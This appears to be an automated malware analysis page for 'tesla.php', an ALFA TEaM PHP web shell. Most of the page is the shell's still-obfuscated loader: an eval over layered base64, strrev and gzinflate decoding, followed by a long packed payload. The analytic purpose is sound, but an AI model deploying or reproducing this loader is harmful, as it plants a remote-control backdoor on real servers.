PHP Malware Analysis

tesla.php

md5: f7235cbb1ff9c21220eb733912d41518

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title
  • ~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~
    \r\n
    alfa team 2012
    \ (Traces)
  • 500 Internal Server Error (HTML)

URLs


Deobfuscated PHP code

<?php

error_reporting(0);
$MEMEK_CYBER = "urldecode";
$JEMBUT_CYBER = "base64_decode";
$LONTE_CYBER = "htmlspecialchars_decode";
$MEMEK_CYNA = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1\nbmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2Rl\nY29kZSUyOHN0cnJldiUyOCUyNE1FTUVLJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";
$MEMEK = "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